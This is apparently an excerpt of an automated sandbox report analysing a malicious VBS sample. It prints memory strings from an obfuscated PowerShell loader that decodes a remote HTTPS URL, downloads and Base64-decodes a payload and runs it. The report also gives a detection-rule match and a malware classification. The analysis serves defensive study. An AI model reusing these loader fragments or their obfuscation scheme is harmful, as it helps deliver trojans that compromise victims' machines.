';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A60D02_2_00007FFD348A60D0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A42312_2_00007FFD348A4231
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A3BFB2_2_00007FFD348A3BFB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A73D32_2_00007FFD348A73D3
        Source: IMG-35235235523525235252532535Selvfinansieret.vbsInitial sample: Strings found which are bigger than 50
        Source: amsi64_2664.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 2664, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global:?substringism=$Gstgiver.substringlses++%$Dervishlike.counta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe
        Source: wscript.exe, 00000000.00000002.2069264146.000001B9DBDC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068617244.000001B9DBDC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Sickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe ') ;$Gualaca=$Dervishlike[$Emarginate];}$Romantikers=288577;$Gabions=28318;Hadaway (Skdefrakker '.ksem$PastogBarmflEltr oAppelbU guiablundl Cr,m:CarduT ysteeMicroeIn,bum Garas Seto Parro= Cell AlkohGPens eConcet alle- TravCOptimoRug mnBrnd.tTppebeSammenmanertBrand Filic$WhitiSDi.idkSjakay Suspg,nimagBlueseOxla.mRe,eroApo.hrUnowneAnalylVedersHexad ');Hadaway (Skdefrakker 'Reawa$medvigAmneslUnsluo raksbForena,astblVicep:DiachCOversoHamardUndsleJern v P.coeB,oodlVegetoUnderpCoun.eBtteprChroms.epro Retha=Sup r Geusi[T rkiS AdelyCatabsAtmoctGgemmeBumblm Mil,.bl,odCProkuoMervrnF.siov.onpreFors rW opstBayre] unsp:Septi:KeirsF PercrOno aoTeak.mviru,B CiviaSolifs aarseLibe,6 .log4FreshSDemeatRavnerKajakisnowmn UdspgAmtsf(Ca.bu$ hydrTSongheforneeKnaphm,ovedsE.der)Jeete ');Hadaway (Skdefrakker 'Sekte$Impalg sa.ulBreadoFin,rbKodnia benzlVrik.: UnheGOxygesSinuot MillgMoiseiavnervkalasePrunkrSljfe Selv=Strm Grug[SaulqS andaySpejls To.ot SkoleTedesm Fnu . cardToutjueCalvixQasidtz,chi..eninEGennen NattcIntrooUdmaadVove,iAnvennMed.cgommbl] D.ss:Sneb,:Alb,rAFlustSA,owrC A.stIU.jetI diff.fodboGE,ilaeWeapotElec STyr,etbudstr BridiChappn Hel,gTol a(Abuli$ KarrCOktroo RededGrouneAfsnrvHjerteEarp l B leo ,oelp Ket.e Da arDivagsEmiel)Reall ');Hadaway (Skdefrakker 'opha,$Ce teg SkomlPlanloSka db StulahouselJeani: MateAPolionSids tH llwi Windn S iniVerd,hFecu,iPeartlTechniAnstdsPalm mS ici=Remin$Bed dG Ma,nsAc,tetBadesgNondeiLarynv MormePack.rAegir.Hive.s ConjuUdvikbKvad s silktantisrFodsaiUnprenGenregMiner( Dupl$ S.iaR Unhooskat.mmultiabetorn.hagotJunkii Lovmk A.kveK.rsfrAz ots Pseu,Gloss$TidskGsk.ldaHedesbMagtai OldkosanctnAd ecsDe.it) Op,u ');Hadaway $Antinihilism;"nrInco.2ig
        Source: wscript.exe, 00000000.00000003.2067919923.000001B9DBDB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW oadwaStod.u EgenbHjerneDyreheBrkrenSuper2Letma0.endr5Abumb.AlfabD SubooTilstwColl.nStrawlDartsoDatafaK,atodCountFA,kfoiTeks l amleVa ge(fas i$ SociGB,achuSalt.aUndsilKldebaMargic FuldaOrigi,Liste$PensiSDecorkTraady vampgSkolegAccene enfamCar io ssenrCo ioeHorselvarios D st)Alfab ';$Skyggemorels=$Radioactive[0];Hadaway (Skdefrakker 'Grupp$BortcgHy nalLoud.oFrigobrinseaAntirle ide: Jikus Baccl Hindi SanigSer ehSpunctMiljtiTa honFare,eLeis.s kseksEks,r=O,ele(Ind,tTPyro e Car,s .vint Sens-Re.eiPBiquiaPeri.tUnskeh Bela Folke$CygniS OverkBind yInscrgHewetg loodeBrobumCh,onoMisi.rEarp.eLil.elLystrsMercu)Appet ');while (!$slightiness) {Hadaway (Skdefrakker 'Samme$Gim,egMonosl R,nkoBedwebBe.enaInds,lSalvi:,etalaLittegPropegV ilir.astraOpremnSago.d Fa,tiprovizstatsa.uficbRvep lCyphoe .qui=Dri t$Pheret,iennrHik,tu ,espeOpret ') ;Hadaway $Anandrarious;Hadaway (Skdefrakker 'UdbulSUngagtAalega eth.rUndertSerpe-XvidoS.picll Vek.etordeeAmmunpF rma L,rsp4 Plan ');Hadaway (Skdefrakker ' Alla$IndbegSudbul avedotum,ib Propa The.lSamme:TitlesFra elLam.diFemalgg.nerhP radt ,ubai StennT,peleParassSpeeds Bico=Sadel(,ejtrT assieenergsFolketM hit-Am,lyPTrolla .onit EpidhFremm W lac$Gis eS TastkDataby s,migRec.pg esteCoed,mForlioPhantrUnbodeKlasslWarrasSva g)Int,r ') ;Hadaway (Skdefrakker 'Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe ') ;$Gualaca=$Dervishlike[$Emarginate];}$Romantikers=288577;$Gabions=28318;Hadaway (Skdefrakker '.ksem$PastogBarmflEltr oAppelbU guiablundl Cr,m:CarduT ysteeMicroeIn,bum Garas Seto Parro=
        Source: wscript.exe, 00000000.00000003.2067669341.000001B9DBDC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW oadwaStod.u EgenbHjerneDyreheBrkrenSuper2Letma0.endr5Abumb.AlfabD SubooTilstwColl.nStrawlDartsoDatafaK,atodCountFA,kfoiTeks l amleVa ge(fas i$ SociGB,achuSalt.aUndsilKldebaMargic FuldaOrigi,Liste$PensiSDecorkTraady vampgSkolegAccene enfamCar io ssenrCo ioeHorselvarios D st)Alfab ';$Skyggemorels=$Radioactive[0];Hadaway (Skdefrakker 'Grupp$BortcgHy nalLoud.oFrigobrinseaAntirle ide: Jikus Baccl Hindi SanigSer ehSpunctMiljtiTa honFare,eLeis.s kseksEks,r=O,ele(Ind,tTPyro e Car,s .vint Sens-Re.eiPBiquiaPeri.tUnskeh Bela Folke$CygniS OverkBind yInscrgHewetg loodeBrobumCh,onoMisi.rEarp.eLil.elLystrsMercu)Appet ');while (!$slightiness) {Hadaway (Skdefrakker 'Samme$Gim,egMonosl R,nkoBedwebBe.enaInds,lSalvi:,etalaLittegPropegV ilir.astraOpremnSago.d Fa,tiprovizstatsa.uficbRvep lCyphoe .qui=Dri t$Pheret,iennrHik,tu ,espeOpret ') ;Hadaway $Anandrarious;Hadaway (Skdefrakker 'UdbulSUngagtAalega eth.rUndertSerpe-XvidoS.picll Vek.etordeeAmmunpF rma L,rsp4 Plan ');Hadaway (Skdefrakker ' Alla$IndbegSudbul avedotum,ib Propa The.lSamme:TitlesFra elLam.diFemalgg.nerhP radt ,ubai StennT,peleParassSpeeds Bico=Sadel(,ejtrT assieenergsFolketM hit-Am,lyPTrolla .onit EpidhFremm W lac$Gis eS TastkDataby s,migRec.pg esteCoed,mForlioPhantrUnbodeKlasslWarrasSva g)Int,r ') ;Hadaway (Skdefrakker 'Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe ') ;$Gualaca=$Dervishlike[$Emarginate];}$Romantikers=288577;$Gabions=28318;Hadaway (Skdefrakker '.ksem$PastogBarmflEltr oAppelbU guiablundl Cr,m:CarduT ysteeMicroeI
        Source: wscript.exe, 00000000.00000003.2067950301.000001B9DBD95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065521032.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065617903.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065880121.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065571506.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065772832.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065828358.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068422793.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068311646.000001B9DBD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065723435.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065310773.000001B9DDC13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: T0 = T0 & ".slNy"
        Source: wscript.exe, 00000000.00000003.2064845193.000001B9DDBF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .slNyP2
        Source: wscript.exe, 00000000.00000003.2067900943.000001B9DBDCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW oadwaStod.u EgenbHjerneDyreheBrkrenSuper2Letma0.endr5Abumb.AlfabD SubooTilstwColl.nStrawlDartsoDatafaK,atodCountFA,kfoiTeks l amleVa ge(fas i$ SociGB,achuSalt.aUndsilKldebaMargic FuldaOrigi,Liste$PensiSDecorkTraady vampgSkolegAccene enfamCar io ssenrCo ioeHorselvarios D st)Alfab ';$Skyggemorels=$Radioactive[0];Hadaway (Skdefrakker 'Grupp$BortcgHy nalLoud.oFrigobrinseaAntirle ide: Jikus Baccl Hindi SanigSer ehSpunctMiljtiTa honFare,eLeis.s kseksEks,r=O,ele(Ind,tTPyro e Car,s .vint Sens-Re.eiPBiquiaPeri.tUnskeh Bela Folke$CygniS OverkBind yInscrgHewetg loodeBrobumCh,onoMisi.rEarp.eLil.elLystrsMercu)Appet ');while (!$slightiness) {Hadaway (Skdefrakker 'Samme$Gim,egMonosl R,nkoBedwebBe.enaInds,lSalvi:,etalaLittegPropegV ilir.astraOpremnSago.d Fa,tiprovizstatsa.uficbRvep lCyphoe .qui=Dri t$Pheret,iennrHik,tu ,espeOpret ') ;Hadaway $Anandrarious;Hadaway (Skdefrakker 'UdbulSUngagtAalega eth.rUndertSerpe-XvidoS.picll Vek.etordeeAmmunpF rma L,rsp4 Plan ');Hadaway (Skdefrakker ' Alla$IndbegSudbul avedotum,ib Propa The.lSamme:TitlesFra elLam.diFemalgg.nerhP radt ,ubai StennT,peleParassSpeeds Bico=Sadel(,ejtrT assieenergsFolketM hit-Am,lyPTrolla .onit EpidhFremm W lac$Gis eS TastkDataby s,migRec.pg esteCoed,mForlioPhantrUnbodeKlasslWarrasSva g)Int,r ') ;Hadaway (Skdefrakker 'Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVars
        Source: wscript.exe, 00000000.00000003.2065521032.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065617903.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065880121.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065571506.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065772832.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065828358.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068422793.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065723435.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065310773.000001B9DDC13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065935132.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2064728689.000001B9DDC13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .slNy
        Source: wscript.exe, 00000000.00000003.2068507383.000001B9DBDB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW oadwaStod.u EgenbHjerneDyreheBrkrenSuper2Letma0.endr5Abumb.AlfabD SubooTilstwColl.nStrawlDartsoDatafaK,atodCountFA,kfoiTeks l amleVa ge(fas i$ SociGB,achuSalt.aUndsilKldebaMargic FuldaOrigi,Liste$PensiSDecorkTraady vampgSkolegAccene enfamCar io ssenrCo ioeHorselvarios D st)Alfab ';$Skyggemorels=$Radioactive[0];Hadaway (Skdefrakker 'Grupp$BortcgHy nalLoud.oFrigobrinseaAntirle ide: Jikus Baccl Hindi SanigSer ehSpunctMiljtiTa honFare,eLeis.s kseksEks,r=O,ele(Ind,tTPyro e Car,s .vint Sens-Re.eiPBiquiaPeri.tUnskeh Bela Folke$CygniS OverkBind yInscrgHewetg loodeBrobumCh,onoMisi.rEarp.eLil.elLystrsMercu)Appet ');while (!$slightiness) {Hadaway (Skdefrakker 'Samme$Gim,egMonosl R,nkoBedwebBe.enaInds,lSalvi:,etalaLittegPropegV ilir.astraOpremnSago.d Fa,tiprovizstatsa.uficbRvep lCyphoe .qui=Dri t$Pheret,iennrHik,tu ,espeOpret ') ;Hadaway $Anandrarious;Hadaway (Skdefrakker 'UdbulSUngagtAalega eth.rUndertSerpe-XvidoS.picll Vek.etordeeAmmunpF rma L,rsp4 Plan ');Hadaway (Skdefrakker ' Alla$IndbegSudbul avedotum,ib Propa The.lSamme:TitlesFra elLam.diFemalgg.nerhP radt ,ubai StennT,peleParassSpeeds Bico=Sadel(,ejtrT assieenergsFolketM hit-Am,lyPTrolla .onit EpidhFremm W lac$Gis eS TastkDataby s,migRec.pg esteCoed,mForlioPhantrUnbodeKlasslWarrasSva g)Int,r ') ;Hadaway (Skdefrakker 'Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$
        Source: wscript.exe, 00000000.00000002.2069459445.000001B9DBE29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe ') ;$Gualaca=$Dervishlike[$Emarginate];}$Romantikers=288577;$Gabions=28318;Hadaway (Skdefrakker '.ksem$PastogBarmflEltr oAppelbU guiablundl Cr,m:CarduT ysteeMicroeIn,bum Garas Seto Parro= Cell AlkohGPens eConcet alle- TravCOptimoRug mnBrnd.tTppebeSammenmanertBrand Filic$WhitiSDi.idkSjakay Suspg,nimagBlueseOxla.mRe,eroApo.hrUnowneAnalylVedersHexad ');Hadaway (Skdefrakker 'Reawa$medvigAmneslUnsluo raksbForena,astblVicep:DiachCOversoHamardUndsleJern v P.coeB,oodlVegetoUnderpCoun.eBtteprChroms.epro Retha=Sup r Geusi[T rkiS AdelyCatabsAtmoctGgemmeBumblm Mil,.bl,odCProkuoMervrnF.siov.onpreFors rW opstBayre] unsp:Septi:KeirsF PercrOno aoTeak.mviru,B CiviaSolifs aarseLibe,6 .log4FreshSDemeatRavnerKajakisnowmn UdspgAmtsf(Ca.bu$ hydrTSongheforneeKnaphm,ovedsE.der)Jeete ');Hadaway (Skdefrakker 'Sekte$Impalg sa.ulBreadoFin,rbKodnia benzlVrik.: UnheGOxygesSinuot MillgMoiseiavnervkalasePrunkrSljfe Selv=Strm Grug[SaulqS andaySpejls To.ot SkoleTedesm Fnu . cardToutjueCalvixQasidtz,chi..eninEGennen NattcIntrooUdmaadVove,iAnvennMed.cgommbl] D.ss:Sneb,:Alb,rAFlustSA,owrC A.stIU.jetI diff.fodboGE,ilaeWeapotElec STyr,etbudstr BridiChappn Hel,gTol a(Abuli$ KarrCOktroo RededGrouneAfsnrvHjerteEarp l B leo ,oelp Ket.e Da arDivagsEmiel)Reall ');Hadaway (Skdefrakker 'opha,$Ce teg SkomlPlanloSka db StulahouselJeani: MateAPolionSids tH llwi Windn S iniVerd,hFecu,iPeartlTechniAnstdsPalm mS ici=Remin$Bed dG Ma,nsAc,tetBadesgNondeiLarynv MormePack.rAegir.Hive.s ConjuUdvikbKvad s silktantisrFodsaiUnprenGenregMiner( Dupl$ S.iaR Unhooskat.mmultiabetorn.hagotJunkii Lovmk A.kveK.rsfrAz ots Pseu,Gloss$TidskGsk.ldaHedesbMagtai OldkosanctnAd ecsDe.it) Op,u ');Hadaway $Antinihilism;"
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe
        Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@6/4@1/1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Dsene.KneJump to behavior
